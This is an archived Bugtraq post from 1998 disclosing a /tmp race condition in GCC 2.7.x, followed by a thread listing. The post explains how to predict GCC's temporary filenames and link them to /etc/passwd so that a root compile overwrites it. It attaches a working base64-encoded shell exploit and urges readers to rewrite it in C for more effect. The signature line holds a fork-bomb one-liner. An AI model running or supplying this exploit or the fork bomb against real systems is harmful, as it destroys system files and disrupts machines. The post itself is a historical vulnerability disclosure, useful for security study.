Bugtraq mailing list archives
GCC 2.7.? /tmp files
From: lcamtuf () POLBOX COM (Micha? Zalewski)
Date: Thu, 15 Jan 1998 22:46:06 +0100
This is a multi-part message in MIME format. ------=_NextPart_000_0005_01BD2207.5DF821A0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable During compilation, gcc uses following temporary files: /tmp/ccXXXXXX.i /tmp/ccXXXXXX.s /tmp/ccXXXXXX.o Where XXXXXX means a 'unique' random number. Unique, but not quite. Only the first file (.i) is created properly, after a detailed checks. But next one (.s) is created within a noticable time interval using _extactly the same_ number and without performing any checks (!). Finally, the last file (.o) is created again in the same way, but '1' is appended to the sequence number. Now, we may leave a script, which periodically checks /tmp looking for cc*.i files. If any has been found, the script immediately creates link to /etc/passwd (or another vital file) using sequence number stripped from the .i file. Because no checks are performed by gcc, if our script was fast enough, target file may be overwritten when gcc has been launched by root! That's especially possible when large sources (more than 20-50 kB?), are compiled. I attached a simple and slow exploit. It works, but should become even more effective when you rewrite it to C... I've tested it under gcc 2.7.3.f.1 _______________________________________________________________________ Micha=B3 Zalewski [tel 9690] | finger 4 PGP = [lcamtuf () boss staszic waw pl] =3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] = ---------=3D ------=_NextPart_000_0005_01BD2207.5DF821A0 Content-Type: application/octet-stream; name="gcc-exploit" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="gcc-exploit" IyEvYmluL2Jhc2gKCiMgU2ltcGxlIEdDQyBleHBsb2l0ICh0ZXN0ZWQgdW5kZXIgMi43LjMuZi4x KQojIGJ5IE1pY2hhbCBaYWxld3NraSAobGNhbXR1ZkBzdGFzemljLndhdy5wbCkKIyAtLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFVzYWdlOiAic2NyZWVuIC4v Z2NjX2xuIiB0aGVuIEN0cmwrQSxECiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0KIyBVZ2gsIGJsYWguLi4gU2hvdWxkIGJlIHdyaXR0ZW4gaW4gQyBmb3IKIyBi ZXR0ZXIgcGVyZm9ybWFuY2UsIGJ1dCBJIGhhdmUgbm8gdGltZSA6KQoKVklDVElNPS9ldGMvcGFz c3dkCgplY2hvICJHQ0MgZXhwbG9pdCBsYXVuY2hlZC4uLiIKCnJlbmljZSArMjAgJFBQSUQgPiYv ZGV2L251bGwKCmNkIC90bXAKCndoaWxlIFsgMSBdOyBkbwoKICBWPWBscyBjYyouaSAyPi9kZXYv bnVsbHxjdXQgLWYgMSAtZCAiLiJgCiAgCiAgaWYgWyAhICIkViIgPSAiIiBdOyB0aGVuCiAgICBs biAkVklDVElNICR7Vn0ucyA+Ji9kZXYvbnVsbAogICAgbG4gJFZJQ1RJTSAke1Z9MS5vID4mL2Rl di9udWxsCiAgICBlY2hvICJBbSBJIGZhc3QgZW5vdWdoPyIKICBmaQoKZG9uZQo= ------=_NextPart_000_0005_01BD2207.5DF821A0--
Current thread:
- Re: DoS attack: apache (& other) .htaccess Authentication, (continued)
- Re: DoS attack: apache (& other) .htaccess Authentication Tim Newsham (Jan 15)
- Re: DoS attack: apache (& other) .htaccess Authentication Dustin Sallings (Jan 15)
- Re: DoS attack: apache (& other) .htaccess Authentication Casper Dik (Jan 16)
- pbomb'ing SSH on a FreeBSD box. Jeff Johnson (Jan 15)
- Re: pbomb'ing SSH on a FreeBSD box. FrontLine Assembly (Jan 17)
- Re: DoS attack: apache (& other) .htaccess Authentication Dean Gaudet (Jan 16)
- Re: GCC 2.7.? /tmp files dichro-bugtraq () RCPT TO (Jan 17)
- Re: GCC 2.7.? /tmp files Zack Weinberg (Jan 18)
- Re: GCC 2.7.? /tmp files John Gotts (Jan 19)
- CERT Vendor-Initiated Bulletin VB-98.01 - excite Aleph One (Jan 19)
- GCC 2.7.? /tmp files Micha? Zalewski (Jan 15)
- Re: GCC 2.7.? /tmp files Niels Bakker (Jan 16)
- pnserver exploit.. Aleph One (Jan 15)
- Re: pnserver exploit.. Angelos Karageorgiou (Jan 16)
- Re: pnserver exploit.. Donald van de Weyer (Jan 21)
- (AUSCERT ESB-98.009) CERT Advisory CA-98.02 - Vulnerabilities in Grant Beattie (Jan 21)
- Q179148: Settings May Not Be Applied with URL with Short Filename Aleph One (Jan 23)
- CDE: dtappgather on AIX Marcin Cieslak (Jan 25)
- Simple OpenBSD crash script Jason Downs (Jan 25)
- Re: Simple OpenBSD crash script GvS One (Jan 28)
- Quake 2 Linux kevingeo () CRUZIO COM (Jan 25)